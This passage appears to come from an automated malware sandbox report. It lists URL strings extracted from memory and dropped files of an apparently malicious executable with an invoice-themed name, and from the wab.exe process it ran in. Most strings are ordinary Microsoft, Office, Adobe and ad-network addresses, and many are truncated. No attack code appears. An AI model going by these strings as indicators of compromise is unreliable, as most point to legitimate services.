              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/AAehR3S.svg
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FAC
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://capturemedia-assets.com/
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.adnxs.com/v/s/215/trk.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/CommonDiagnostics.js?b=16521.30551
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=14512.30550
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=16521.30551
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=14512.30550
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=16521.30551
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-msa.png?b=16521.30551
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/jquery-1.12.4.1.min.js?b=16521.30551
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/knockout-3.4.2.js?b=16521.30551
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdn.taboola.com/TaboolaCookieSyncScript.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://certs.godaddy.com/repository/0
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://clientconfig.microsoftonline-p.net
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/avatar.png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/bundle.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/fabric.min.css
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contextual.media.net/
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/botguard-scs
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/botguard-scs
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lif
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240352351.0000000004DC1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://eb2.3lift.com/sync?
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-FRAr4b&Fr
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.co
              Source: wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: wab.exe, 00000009.00000003.40243039699.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241918719.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241974058.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242794079.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242860645.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242752420.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242191086.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242028208.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242244213.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242980257.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242920703.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242136692.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242079889.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241811190.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251742815.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242691645.0000000004DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://ib.3lift.com/sync.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://ib.adnxs.com/
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IMai
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IQAK
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWG0VH
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLcTb?ver=b557
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
              Source: wab.exe, 00000009.00000002.40252547768.0000000000306000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40252547768.0000000000302000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40254832447.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251240808.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://login.live.com/
              Source: wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
